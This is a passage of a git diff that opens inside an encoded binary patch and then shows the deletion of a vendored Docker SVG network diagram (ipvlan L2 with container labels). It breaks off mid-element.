zzM`~SCP}>2?eKYF%NCiZ#2`R}{&q)<dnsx^;#~4%xzo2gjxdV<;iYhhqH;T`B8N%t
zk0*_Fs2=@MhBtuOjA_6`$*>wSIp{Asy>C$kZO}yMLs^^;#GzKbS7(k36!uf06Z#|e
zx*tAU%1811d|yg?vlD08PR~m&Vb{?O`WG9`)JFNb>-`xHoJ$#1dh#AmT5pVvS0`e8
z>ITWWXd_kNEv<qy5VKm*ovSi(bLm9a^dV3UrqoPTSpJvy_%YRd58Lx%)(u<xPc%nz
z8Dpn{UXbGMV}G%``yrYM%Y%u3_sJ@p%>sRCPku)X1vCz>><^yk41wTBFa|~A9uTMi
zGU*kw3ArXIqqp_#5x){d+Yk1qFh0@VSj$}sC+k}c&tCnz(%Zyl+>H!4t&;l-v^QbC
zuFL~^61eSn)YEj;n4T$AMMx<)t19B@yDtn=DE<bB``b&31Nel@bpz`yYD(xWKFCO>
z%d$cD$+cFO%Ok5&N3t2i|DZg6WO<d~OeocoF!}i3qS;XEP8zL5!;{oBZQ;|7tPOS!
z%Qwt)QeX~Ud)ERtcfcJIH<iKdW7aTG^45f#1a=k6VidNT-?M8w?gg4r$?5ZsW2M76
zwEXy%<{!N|6uBoj5=wm_%em6Qlqr*9d;=NK40xP-O&tB%ZxFa*`Guy3Jd3`Z4UT33
zWG+uZm~r!;g%y~R+Dq9MY~r>(;4Z1R8zUarsw+Gl|DCZ^F!6Ku917<Wr|{MK@)tQ8
zIlF;30F5lt@Dm(`gpd9$MBqo@ZSIG}(cN$mRXLlH1K#D#!)$egZ2+DJGyI!THq#M*
z@f&=jOID~Piqx`!m{mc^eBswe>=nRUrDaQC;((|5bk3#EuDg(C8dM8zi#N?!^DD*J
zl8^t#L-=KQk)_=!qeF097**xENI4nB-Hrk&-+2EcV;|mD$>718qhD&d!sVi^%Z;`e
zG->sKZb)9jCZ&4z41z82_sbDph9hBScaTc3ZkzSzw6`LH{Bs@7xCLDQO%m)8o1RsJ
zb5OG+`3JF<zcVZf0a2u7x+5VDaz5w(7rdP%KpEza&d4G_3As}*7VjLQl+J2^t^RBC
zFju@9YD8h0Hkx@?a_Yx;G4oJA0(q-pAjU2Awylo9*QS4m!`sI0w}#WLH+4tC;SAok
zUZYDj;kN&#bZ5IVOdVbgs&OUT3egE0M=o7)6w-ydK_(*$WE{*Uy!-yVp2X3^0Ij?3
z6f?{stmOH0o->uX&5Ys8_5YA#4=lqhulntMDjTMpJWudYSN1Q&zLa5VGdCzO(VnNW
zSaxrcLSi)I@azIDV_5_V5eU<<DD9ZfJ8(3S&qTb>Vxka##r?>5(^|}#>ROKt{QnCU
z#DwD6gpTc4zz+kj!7D{9vADZx**ku@&1Dh^<KH&Rs*nu+!?I59p#)GRjl)x?N>v<n
z#@t-?;bcj`yFVG&<MeU%-pwVz5UcY_nNrp??em*jyZeE3rN3PB-(V4vz8cf@MB4_|
zeK(}q=+b&ip}&S<?8Ra|k5&I(=S5HrV|GUzB&`%&Ue0I<?39phouE(}0J3D^-A~r{
zjBcl&X_JVA5XOBi?tV(>au4`aBsh2fM1-u+iJnet#27HXt0=yjrZf_2bdD{3u0wb1
ztk`VS+>C=nKm@mGQN$~|q%BT9IpW2_ma-laOSD1cW5eAtM<Rz1qg@VTE^VIikzhfG
zTPA4c#jyHISgBeEN!1q{k6ho%RXJZZF_B>xF~NX`&b=y?39O5!V)yk*YUvpXP;-ot
zp3XYt^|@o@^!JC(;w8$X7uU!_Z=<VK(&}C{LBwt*NqDki^^Ue1UEpyB@Fx=;fIU^b
z0^E<Hp9}QuE^Q+dygLa{vho%Y@*5p;d#HE7cE{~nS)0a-`W(A>qk~1gPZ_p6SY63<
z-Z5cBjpCHm^%bGrd+%^>m%+Ey)TNbp+o(t3zs8x?f#xPncu37YNd~SIgFY{F$8W22
zn^@u9pNUw1c~;Dzdg*pQQ$76{{X5R@-U$9#<Y1<;@!w;5>HuGkriW#`A~*vshU#7Z
zbX?V($VC4>nR04uLJ&LfcFwx^-=S1yC`I<M5@YlEA@y*&W64aevYZ(P8)fOV5Vmg6
z(_YOMwb9MQwaiAn%d5>^&Pp_{2#NRj@w>_V9;u9fSNUga6heP+mrf=TB-R7JO=w;_
zzhdVV@Tl{l`|E@v3Cb6ExgFu)!Jyi|OIFapuhNF#6S5o(-b!p*-wyr3Tyio({~$l}
zCz;NR(U(s$EppiT?MsvYrl-}?CGz-ZDaMC3b5zLNM5r=nx8v2iA;wK^*>I+KRKe()
zWhSc+azN<Ymxs~{^|bs-cy+Syr0!h$D%qlvYTE0jTEo&_S94)5&V(KJx!m<ivmI;S
zch+U#13v#(h3^%ByLfV(B^9-1;_a5|xi=o)t5Fp5u%agXiy*HM@srJ;dQ31Q{yN#>
zyPPrUXx~AJsk34(T885<rwmcY1Zw!Y&hi&DUgK%@Z<yNza#iQITKv+JiOdhd{YcPS
zQvnSpP^5nRixZZ5q=mGqqNbvC?cA?M{$%qxJIm*OG`KbzQv#83p4Iue1ON_D$D{AO
zU3Lhm0W3NGbd!d%$9^b>e&2hgYseccc`*+-?2Fs#S0gLlUqdpWCf|boccW!7GQ1_U
z1hr32NThsRGG|^}I9g3ZV`!FqLnZ&=MGDWXc*bqPGU>~RG@&tG{`9m5j5X}-$;xnR
zmnNj+^|Q9sFA?5$3zKMy`n*BVzZ5X97##Ra_#bP$Y3}qPuP6F=Sq?)Vt-(CIC#KN5
z<CJ6D67|1E64i!%d#(V81PBz@0Waj>(x3Za=uloqyq%ZFXC%?{ssH{aK~3Y@`6R#R
zc2?ovyuPvGP5Yu|rRO4gj#eo#R1@Hs^j3a%b`<YuShq^e<Z2)G--{o#fG}+6WF2td
zYcR?{?4`?Y4U~*<BH9q06`e08?FTotwPZUs-8NUWZ-Cs;r1_hX-d7-Dc_d1{F{^{u
z_H3YIr6+5I_UUF<;f=rwn-Etn)8+&48!by{fVZ^xQvs8;$)L*bu|Kn34*uLBziV=-
zgQ2tj(<umRX=nE7*U$J%8m}E1#5Z>{^LD8YSpL5a1YQWfnB1zrI5^1aRgrX1`-0#0
z@?^eE6Xy1xNP27H6A|AoYiVf-R{@9*dAE)G7C(U(6IfqN9@gP6?&3Tx)8$M{_t#kc
z_+1c1>W}{0E_+58F~{^6s>XFT*GEU1VgdYWvmGYU{#7ak&gr7u8~<MW*2c_9a}asr
z3kg4-Sqa!qC+&9yG|mV;=6D!G*|^R(CF^e~#tx%zs}hAHLI9Unz`yNW0WyBQruy=H
zepegdd4vAaL?QO|ZJfYs@H>kCQpQaqsE#~pGnDU-zx%p2coe&^WxpC^{J8yg>iUcB
z%<DcxSY~=??FY#BpR5=`_kA<+8{xl%Ip`aLzPr5Y>7KQjsT?Bq<mK<Lb*m}W5Ir9r
zYW!EO*y5ShlX`Jz;DftR5mbTtyC!act4QBUfZpJ)^ljIllh?5|-I<`*7v$*NxDMc7
z!a@G?|INR*<Z@lPEuuzo&MdBMuz0@L$wGPad}@O7MRAD9#YoD3%vc40ava<b5}2ki
z%>dlr`&9xqW?QAb=F-~Fo>p?tUcAn#FZ%z<i)qq_;h^dNR+R{zYb(!mdX1m|Ww^fi
z8j6ehwX=gM|B#Zp<H^<Vf1K!!XBG@@fGOAhxUMZe$32LA3^!+lhe-l(d%AUs&=c|7
z&edMhJ9Z`&>HfHa75l%zM<BM(b;#(w;(5OvpRv4ujM$No{gwyk6ghuk9szg-A-IR`
zf_x8njzOnwvuWCp-<43m<x-_(Vr(V&<B<KfU-ACbb{mWJmS|Bs2wjP)X`a2_A06!&
zN_e^nCp78s2|rR}PNjyG9=vwL966w8gT9t98tRH8JPUkDKnQkguGcoJSS_lcy4Pgh
zL$SV!;qhRcI>}?u=B`eQLBl``W8T#~K}l2*i);+X6tjk1<S^W33n3>od`E<g`OqIz
z14#9^;Ae*qF3?wS05jz+iuD(KHRP)vXD*G1klUP1JV~#Ay5@d|Vy?rt;F03K==tO0
zT7~9lC^gYqyK|AQaw~&jahr8`NP#><<XoPYQ_R4p>Y=KV3#P-k7eqGT4vqwhBlo65
ztTaME%Y#Jh8FkdQJSCx#Hr{%JIXeBPR7JPYBK2Jl#-%6PY5G~ph}q1Wt?czkwS`X{
zyc6%}J&qC-5yAmc{s#k1o`37J4Xe|z&0j{^Wbsn}T(zBQ-+Ay@YOPaH42kKAZQ&~o
zB;#$xe&4N1i)V@I25-gNut0?(nZyyoHsN*cK3%6vsLeQdDv^v`n3=ihh{qwe2X-y+
z|FzN;nV|12mLS?6gb7Nm;H%};AHZnUJYw6~Ak#~YsV!^wU)p9i(c;2-41MTa>HF@U
zb|^cRS!3_pl~O{)sndA!Gs>b5d+xKweeuF;Mp*FzY9WX{^~bLnFzN&Eyo??MJ1CIW
z)+_Lb4_dgOBTwXzsqGPs-Rn1hlBQSq#x(L?H}XiEh<^&NuH^7bVU_2$<BI&!-qG(~
z)(4qM#|{_>c%Lf=rdmp3Ika3ZNCpvIcWJ>I;p2pp4KJ*Y$bb5iMrlIp-YpUQ-XPY<
zVsD;u#DWo`$DmhnSi+;|o5sRg<yWUr(Tfykz_v?-z%8^2{z4{^2zP)@!Gfk;sgohM
zZlC<=M;(FSc>Y-d$gV<!*pw&Ekkg8BStzXRIm&##QR9g1JqcOd%o3$9$B0I^zbo^r
ztOj>u&8I6~imjCdd2~-T-1k59YaGA&iaH<IOFU*9iBL4p^JKnHSCT<_H))(C6|%mS
zAV#i^#~<*}v<Xk1jsH)#91u+7*I3kM%qcyz`5LI597=Cf1rNTW(NWtF6mhXhh|DpM
zdTa^MZfLZdedv{>Ii)8SWJp6&U?3zxQ1yobk<|N-nQ1@dcLG>1g#7Lk$$dV7a4riS
zs>4Lzu_K-6tmmAPPXBEKlk0x^yd4W-isCyB$!GCO@vaYg+0aDT@fI)NvHW!XA7(0O
zL!G1qYjm@LGk1*sHw$`UO3h00EEth@TUG(p5`PLNevikg7>4$TVq+^&&`#B<Wmw9A
z-6YBZ`0~`)P8$PA7E+R%+3eL3b=|<2NCwq)o~8UVm2J_2wl3kL(!8;zr5a!tze0I-
z+~jm%ydJ7KdfubYwIVCG6-`RcUG4T}buy}4M$8GlWi(18Ya5dpZHUyY#oEqglLe`0
zGXWdcqMKS%kbvKnJl_4PV(2X`_3&tFY}GoKx&&J{%&Wwim_qr7SdCa~rA%FwD;-K*
zoSpNiY0DmNw09uoaI0Lg7oDRq5WjSmt!lWN3P~<kiAS?1?04OGqo<{KBGTSpdjsjE
zTQI))fV1vL*2j1T)z5o5-rKo@wne&?0;)Cev}SdVmi=&PYBMoxQ1pi<9~56Fi6qV8
zPDb_VrP|HW(oZ8BIC-Vn=u5Q%XeNB9)rRFnr0L0@@iOr$Gcc=b+CM1MUw`DtV$MJ_
zQyYtRIPpIb-)uX-yrvcIQin~lkhc6##R(44hDEF^>Yx^9O}}Dq{44<MS_gc`yv|Wj
zMB!qbP|S4yR*jxS8KLG%o>aJB916HfW>L&MNk!s)l$m9J4V|-Yjd2Usct1c*rDSyF
z8J#b$#-xF7lKcFs$@;E6d{7&<h0s+w5Ap5C$r3+i9r4JeB?BOmFFg6O^I!OXTH#&i
zXkmL+%+*F&D}H1Z&U-V{22O72yz*dtam;lHCk;f`MMg`23JottrphLI2Q59BzaUL5
zw13h)*6OCjkxN^A=-bxL7xHM!_<lufUP0^_IN6sBGRjPper7oTVo)1|uPhpdt?N4J
z2t3vR@{K^*mz;^If#k|-%>ZWkLp|c*1^iFZew;q;1E<o;39q+T?6tk*7)|fiD8Y{7
zx+V|K+|BOM1-VU%UmU6O;?do4Rd$co2ml`(1x}?A7Gu}@F~kPsDxmFiXfj$+#|pnT
zPqNdrW>8r39VGtvpq1!O;q59g-EM_5M5wJ&jy95n3e11Bjc+k%xM~pQm4C;D9XpYL
z^zkQhvUO1=+S^a~@*MMXU(6^8QQ_}bWszEHHs2mlU?DB$hnTbZNvl_Y^{5tmf_kW7
z7>PD>P|{RpgiOT=f`4xi$L>O{N~$sp?L&)Phg>H%Xj+-b>4(QIgl*oh9FvxZmlx=I
z?Uki9PNg&Gs%X*JS7fAzIUEVc6U@EnG7n{XI+SSSojGM>U>dA9yO$6a4*Qq)&8XB>
z$9LT%ZlUkovhbG!Uf2Z$$|El>$JtN>f#bCMWUTop5^VCCKN_#;98u-Qzf(q>r4UR1
z)mHJyRTTa0HPtjfHZt6Qf|2~O>#xC)uqyq*lkW7O<dtVcqj8!!vcm@<?`SHr`kHPU
zGu@c+GyE<XBS0}Idzy&g1o`VkH)pI@9b0MsEA#+>&$F*$B8HKnQsSnoiO(MJPDNmW
zXXV$3TkYN3qkZ^lu&f#%#gN|Is@cV|tbrAx*TBWamFItnJT*?UKUf#?q0kh{_H=*W
zMvb5p%Y}uYRt_-5e|rc5D<n9YSv@)`3R##08+%O+$0m+F;?a~n>AlW+XY=FgYW5nV
z>+tU`KO&)l9xAHYuw(I(rp4zVZ}y6}XE1c$hJEF$M<2&Q_O+Oso6}t`2_5js+?WD;
z2r)vtP-X%_iA*!^>!RCJD-O_vypBKbr0Nk$?P00TaXSz<god{M4N6rE8yU4}4A$n0
zI6)v{Y_e3YfKuDTwzh8KbT&#5jA&U|V4Db~1zSF)Rbe<N77pb9J~``o6;(31l#KSN
zq;0=~y1WN%A}Zqx`(E2UVu@Ek3xo5#$)Q!RT*y%$!0#G05^woav>~|=(@*#;%gqky
z)Kv8hX8FE<x&v~iUp0Xbz~YaIZpHHQ9%vrI38Vr)a`UKl^3@8C1T7(9lIGL7B6cm*
zR2Mr?S53NPbIPdqL!ytzjj}kJz%*3-;>Zk=v#vYx1k_F;t1kd@(keVNT3UEMf2P#U
zF6jI`E?gig`BmUU)wh~r5DN}_3Up*M3WuI>+1#B_7woHJL1}Jnk*es@^USNzTNT6h
z=N*c+xTK_H1voS`R2vo<8Mz#Qjg74dq@_*6QQmr8>aZ{|@;n*4lisAb2Xuq!(0CZ_
z8L6>kG~}feh>PX5aj|@XUnFyL^RNvxjD?G7i1(r%X=}EP+FUn+7js!$&YIhfY64CL
z+x_xRsL06Jpg37^hzPr8pZ)Bn0j;c*=7V>`l&+-kJR5&>hr>I(3VUj_csveGTCSez
z+>Hf?&@i5<GXFY!=P#D{F}v2^2oB3WqWlbpB7NR_>4Kzz=u6QP4Ri(O_@<u-iybFT
zZgG#hyhbbz2}c^ep3qGL9tTg@e#BF2IH}70Ot&{n)a~EUZ78Hh?j5a@IojFQVh($;
zG1n%%gVpTgl~~PR@PDn1DWX-P#_K8Fywrg5#$Q#)PdF#Xlgb)d=JcvI`fe|qZr}g?
z^?KiGuCHEh#DVXYf>9zL!|>6zhQ!8OaJDk%W&G^rh0qe!RwFTGZb6|Z){|6HO0lno
z_-RWgnH#>kQU5)Ji7Uw7c6qY3>+@5cQRFwJ2K0Dw!cyeL>YX(Nr5|aggseJoPnQuW
zDDtcLf^<)D=Pg+$MNK0Xi^&eIAH{5QF@yBZM-9N{0YuD#P3x*TOs;~3nh6m6$*cK&
z&9K`5=9>)tP3wb6L&t9E<%yNzpm3W|7i+tg0*{Z^^801*SFx1uj}8YFwj1h(xR|yq
zON-+tRS6c7<ipCN^0f*jZPEVDooTP@&Y@0D+#8}}d?UPi*TL;r#_itR=<59-RtD+|
zS6ZwBoWuzIR+b94mS|^sx2C4L7W7<tL}yP?tX)fP`+faGt=CHX<;n+P-^J-&HnVHZ
z>#x|2wb)VLnsd>Q@*h%W$Bn^|rEM_dJI@MY?Rurq&YY3?@QR>cztxq`qR!X0xEi4w
z1ZH~?=0G?)ieKqxuZV*f+I}y}$6xV0Je30Pr)gnefX97=q&%OuV%=mp1MKOt=g&RO
z2u>v>)?;mT%BC)(P;@fXhB)GgTsF(7&G@ieJ^uJETKAkNks!L=(bSMeNNPk>kb7-q
zeae=F{aU2IYS<WM?dbcIT<!Opwml!~{X^e4pA%_Sb()iqT4mexCVFIY|I6XMvA(!d
z8hTx#SJVf)eSZ7&an%cF1GC<Kex>GMu2pM6I_Z&kq&C!k?3|$J<*npK@v>=4TXEw4
zKNc2K^j-Zy!zaxrc~Aw{e9_h3<#nD-;w&7&qRXGLZTf3mxkdLSoNw1N`tL1@3c<xR
z0r)m5Iq(Jvnf&s86`6?Sh*MF{-X9HM5_@e}%@W(H{mT7*7n{s*#AI7n__XBg>8#oY
zg3t3_PY>%}g;8+#FC)t02H^-fe#REeOti3|FnBq;+rDZ{R?qhT1-F_jwfOlv<Fijk
z9NQbZNi;RHTin7XJ>2xTZ+-Q5bkc}5Rj=YJ(kfT^WMiLmwaxlXw1X~SQaIquj6l%#
z$*_!JtuSpLwk-+y{UxD^G+S|wX#FH@m=|OA?iNC_?F#$Skc56=*8ShUUFGT6h_%h3
zDuW+X(^+h<PDi=CQM<mEe^{Bd0*>cD`<ugFa_OMUcTZXAQeItByq+J{iS+>-^2oBB
zED1w>$or-H8^9bPN(hqe@J4%M4Nws{27yY|*jxlrE)++tg3=2+JbzZ2Ht-15TzK2(
zEq@uGva_@>V@*r=f#R=^#tFA#S;+~JCLezy#kdhPvTm=@ZAard>^n4z6qqcAIr~g_
z#zlSVwb9|mvC)lKK8gH<45w_q2$fRdOU>ZG%?fwY1k)=DIMr@iid2LJV%i*cvHJxC
zeK-iiNwsjoCc9#5IW<UL=P$0NqZ3>hHip{oDWoEzKd$WoG{m^-&B@+J*vHuEXhEED
z?|T86vw&w*or*ZAt83}swy@B_|5L@4heN@2@iB<TmL<#>+lyphifqZgWQiDiWG7T8
z`#xoC*(Qx8WNT!X$Yh%g4GmdJV;}n(2H8S=qxX;R`|h9TxxahQIrp63xzBT+=WO=Q
zvv&xkTVy$y2nDO7>hr(8kj?NYZD5}*E(}&iqqr>BZQ{l-<4a|ZLzRzN`e|QDzCgw6
zfaMiSn!lqWoAY!Rog+XkrjUS?%ah~rWqZN{^AZWtEs-h$=E$*ep^NvYb}u!eHgLjl
z{IRL(gGx$XK1gG!i_vv3rw?jw(0%yz+=9LHr{&*^N*uX82v}xIFilM3EqE#Ex_W4P
z42NiqPMkynkB`8mg*LM~Cd9L8X8-v#;clUNVMJsUFLrmG$>g@t-Q(RLtt>j0<I`h>
zz!E`aE|&d;%2fEwG`Y7S27mk{%Ej!}8I$ADwDz)&CvepPARixJ0j*klw1HqLiaLz*
zu$|mTqo7W7AJ})o+B`9L53V0O$*IzmZ68%Dbp~8kk>pQmK-R>Fo7=$|wW=)mcnNEX
z>TF#uy8Y$~Vt(ohZd9CJ)b6o**~|?SuF4B4ul}C80!~_3Ujr2*?{(!fjSjobZm&5~
zJC1vPed|ZaULhXuN^`*yK0CYn=B#1w6>oKqS+kdSOOWb9dlLjuw&-)R@h#9y)D{gU
zW0NLSpF6K|)Xljy0ay}!EaWCFnNqC{*3O+N1Jeq-gekxBj6F!KmdH&0^>9H?hFgTG
z!;ODkzV#q=_^Q11$Kr{;nJ>lfyp7DnmQWJ=N#oqo2t;QslVI5Ji2?o}na>QCp@T#V
zE69-}5-}t<H3K`$JO^hesmw6S%ITsT)kyp39{do3P8CR9a3K4Y@z5QajOWcn#6hQ3
zH68j)Tmm024m*AWr7v6m@vdqJP;wdCf9f<^+K{A`U-V-!rhs-@P{ZfBF+nBm7tr2i
zY2|1Ns?^UBitrFBqGn0~Z}_L3H}DS^7omMhG7uZGCe%$*TJ3$ppK2mjkxGU#W{dX~
ziwmEv$^~Io0fx86%_}9%TvJ+bbg=aKcdANhC9v4U{(?A2U?s}!sbEL*Y%si8;4#gZ
z=Ke31dFVxF%YoXZKf3fe(SxXFk<vt%h78?LNit7o77o)b)ZGYv)U>T9hPod_#wgw&
zDk*mX;;kBl4Sl)0bO;`w!1Fxbnt752v~PYN%)Z7$>I2P~==T<39(;w5N9(v3WIkmW
zd59mlO}#Lz&mZF5o_1Saa?i;A;~6E|(~rvlZV)Bw-t^v_H)E4eu@!t>dDZS+`FE+t
z_OhJ-jR9Z>_-<<CN7BhinWaFJksUgtAFNlY<Vgj)Q3z$V@7~bA>A32giG6D81%G&(
zRCAgWi$9i+g-%x_`00^VV7b7zsW-YV`Mf#*1REgaT+!4Ryu^By*bsYkwdcq|pf!iV
z7am3P(0ku(1#X-A4OHIQ%8M^b*rV=_67D2WU1vD4y8B3Z;o;8#LIj7kG+5-x&K+O3
zH8!NdfWP}KlT;&Xo@HjyAn=hiLrmu_sm$A_6N5@p#^a@7n11aWHs$hT3#-@?FCB(x
zj8Fn3swk#Zk7YotnXl<$P~Is{!cRoT1jX-4l}(eC$BWIS?URCy<K(Xp=<Qu}8Sik!
zo0qc!GULPlhVMDcl|*@G7cQeB1dU?cpI5n;Nd|n)Bvw#MPU1!P3QJ?F^UD=;GpTJ*
z55Xgw?g}-zkmmGaSnF)6##XaUvx7O4I4(bS=SJZY*tJxH^L0pBt))@7E%caP0P-Ta
zw3b`5lN&{i%q-T^hf=J%+C#8YT!W9W3YLfJ4+c~&Q^%&W>WfF|LZ0+a#fAJ;i6MTs
z2Q&}r{8_BXkVcz<19BRgEN<RpD{^4}Z8ythh411n4LHx5_FA}y$$fvv_L<gh-`<qY
z<b`bb^X&X?s=6;hGSagnQ}K`lKlp?aT640IU}iH?_<{#iZ1t?qn8r9+>IV<a-)NKr
ztl{!Rb}Y&J21-Fvb4abvryK()#c3kP2b1R=b{&^7(k<k(i20Yi)YQ}%LMV%qOeT+O
z4gg8~RY=nA_9M(}Lu351{}*D|289#0F4mk$BQUd9&ZL`FduMz3N0wwI*TfTdZCl5B
zS%`+W1r6R1I_va!gijFWnCY-Bx#u+7b)Q`=x%`JOZ2MwnEzZDEQPo6d3R%V|B0`f>
zybHBb4)gL)Qb>;N-i`i#D{k_u!9|eNiNu5H{mf|@1K-<eT@8!zx4uIP@XAi>jqn0m
z_1xEkjfz@j{&L|h$U?(v-m&(p9$rsHu892_Yc2@g($tEoe`6EoQ80uiFcnrRsHFuy
z`1ekO+)nk8FdibDWB0x45%^w@{$!WtkT?5q2BTnh$-mH!+%}X~bkijH$PS0M#oC{z
z==v~Ms~TwhA(`apZZqTa^2DIJDLIAx$V$KB_v~)yQX5);1Eyok`VkvmFiBqhFRpy%
zQ+4Z)?GGtpYFvk_8>Ug;x0HbJex+umjl!_4SRf0HzQDKBpa9(RJ*FuoYoE3(inCc#
z+%Knz9vYVG|FBj$8gf7a-ZB?oA0gaoJD9=T1sXeV`z^%Z8i9Q9pKNqgU9p`Ja$QY+
z2kj<YqnG$CEZT8A9iF+L#QLdUI;8!~3hi263QOJ58s=kLdE3=TYzh6dbiohQdk)Ue
zNvU7cv|TDJcP4^P|KyeMb!$(U<SheO{x>`#6k|MRtzno5!Xe0|Y8Wd}EsBX|!aA1;
zo+O^W9QW8a#8Il?W+-QS8wfADdFkCioB-boKcPGHGDjrlkY(!|=G#L47oLntB&ad8
zdJfh%-H!`F)_%Rya`|T9Acr2<t$VVZ@grJR41|m)eNh#1XXAUYK6G!6($2Kj1wK~k
z<ReSAdIlbH6~m(Sv1W8nBsKEZk|iXhKM+wELu7n8@VN!--1|mul?$->w}sk15+(1H
z=E^P#LrFjL-*YYN|3Fhy><nzbYnMidOUW{=|KOv^m90onA)c?gZVq;g03j=CRCaWe
zk@IX8Dhgn3q$aeHN3CS|+ib^zZ3t<Jj7G&Y-=s`EdZu37%BXNphxH`NiP6@9E&NrA
zr4t+3L6~5Petqh4gIaDO=RJGQIJqZm{Qhx!u^#)dK}1rFXKZkVSQm`Oy8{A!`rWH<
zgd-8v$h#;iu8l{Vaoc&5Db*px?NT_)oIpC0gYoChaL(!X%2%nhyQ<Yi?S<<A4aK~p
zgsFD=YrR~b2T^RAP>)7EA|UOxZ=LwLZUJ;8NyHp6N@5M+40)g1xpq)1b#0CaR41Yb
znbX*_ismgYzu4FFOfY%r63M%p>N!iTh`6uuiW@<z!F$1qJa6jcz$swX6e-8Ot0AL?
z^PBqG&MzJRI|$o=4Ikl<x7J@_1OzXXCO0(QX@6PH$XlqzJv@Ku*^Q!X(d+(oX+Nii
zLP!nd_WmL%rGLDlBKEL=EawY2=(4HPBqqko1udh4)fzM-c~aS{Z?u3`mVuPlP-rq-
zKUzx!)$cvE`u%0@m!pbLeR^M2f4Q0kIDlCF$n>4^gZJk#F1v$8X!JDx;5x(B1aw^B
ziv!@%#~}@6r?BJH8Am7P9M|}3rsl54Y<X-K1Hg}Ya&6UmfE0fy57T+RJPo880B&)1
zs!>zxNO@cn5>3Ln`d!;SwRHE21Tk^1x~Pgs*EnrW>_iT99xEcEPiiYM8oqJ9GBrt|
zbUs@Lx-}L7tKmRY<X4o=sca8KlHcr_)=||K$j6&At0&r$;-8jo%)P<X(cDVl{7%Gi
zE$Wx;K&R(8bR5ERK$|PRfH~Z@mDd+MF{W(A)8J_%_|~r+=t@RHL{}w*4X2NmBPn!7
zr=%N_QHYT-^UqCZ*yEA;J-2C##o;J_O#}krNyWnQf9V)<;-vamk}_BhAlpL<gQ$Z3
ssRP`l!UAJx0So|6fF!^M@IL~5s^e<Lud0h|ZD$BWT~nPJt-Epm0prRoN&o-=

diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg
deleted file mode 100644
index 48097dc83b..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg
+++ /dev/null
@@ -1 +0,0 @@
-<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="343" height="311.5"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs><linearGradient id="tFoWDamkeRwJ" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient><linearGradient id="rNGNyECMdeKI" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient></defs><g transform="translate(0,0)"><g><rect fill="#ffffff" stroke="none" x="0" y="0" width="343" height="311.5"/></g><g transform="translate(0,0) matrix(1,0,0,1,77,162.90096991491666)"><g><g transform="translate(0,0) scale(0.62,0.32300163132136867)"><g><path fill="url(#tFoWDamkeRwJ)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(1.6129032258064517,3.0959595959596116)"><path fill="none" stroke="none" d="M 0 0 L 62 0 Q 62 0 62 0 L 62 32.300163132136866 Q 62 32.300163132136866 62 32.300163132136866 L 0 32.300163132136866 Q 0 32.300163132136866 0 32.300163132136866 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#tFoWDamkeRwJ)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 62 0 Q 62 0 62 0 L 62 32.300163132136866 Q 62 32.300163132136866 62 32.300163132136866 L 0 32.300163132136866 Q 0 32.300163132136866 0 32.300163132136866 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,84.45937956643391,158.4009699149168)"><g transform="translate(0,0)"><g transform="translate(-86.91999999999999,-162.47030107315481) translate(2.4606204335660777,4.069331158238015) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 88.95937956643391 162.9009699149168 L 88.95937956643391 195.20113304705336" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,122.54062043356592,158.40096991491632)"><g transform="translate(0,0)"><g transform="translate(-128.46,-164.19297644020213) translate(5.919379566434088,5.792006525285814) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 127.04062043356592 162.90096991491632 L 127.04062043356592 195.20113304705367" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,103.5,158.40096991491666)"><g transform="translate(0,0)"><g transform="translate(-106.14,-164.19297644020213) translate(2.6400000000000006,5.792006525285473) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 108 162.90096991491666 L 108 195.20113304705353" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,35,196)"><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="28" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="45" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="45" y="0" width="57" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="45" y="12">container1</text></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="81" height="14" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="81" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" 